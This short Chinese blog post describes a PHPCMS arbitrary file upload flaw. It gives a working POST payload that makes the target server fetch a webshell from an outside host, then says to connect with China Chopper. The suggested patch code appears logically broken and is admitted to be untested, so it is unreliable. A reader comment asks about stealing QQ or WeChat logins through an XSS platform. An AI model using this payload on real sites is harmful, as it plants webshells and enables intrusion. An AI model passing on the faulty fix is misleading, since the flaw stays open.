A-A+

PHPCMS最新版任意文件上传漏洞 及 修复方法

2017年04月21日 13:52 学习笔记 评论 2 条 阅读 52 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。
首先打开注册页面,然后向注册页面POST如下payload:

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol=

然后就会报错并返回shell地址:

PHPCMS最新版任意文件上传漏洞

然后就可以连接啦。

菜刀链接

 

这里说一下修复办法。。。因为本人也没有具体的环境,所以就算大概的给出这么一个方案吧。

打开phpcms\libs\classes\attachment.class.php

找到 168 行 也就是代码

$file_name = basename($file);

$filename = $this->getname($filename);

这个地方,下面加上如下代码。

1
2
3
4
5
6
7
8
9
if(!stripos($ext,$filename)){
    $arryfilename = explode("|", $ext);
    foreach($arryfilename as $n=>$fn){
                if($fn){
                       $filename = $fn;
                        continue;
                }
     }
}

就应该是可以了。

标签:

2 条留言  访客:2 条  博主:0 条

  1. ahsrc

    哈哈,我又来给博主留言了:
    祝博主的事业红红火火。
    问题疑问:博主,xss平台有没有办法抓取调用QQ或者微信登陆的账户密码?哈哈,我的思想有点龌龊

  2. 影风

    回访,文章不错,先收藏一波,细细品味。(*^__^*) 嘻嘻……

给我留言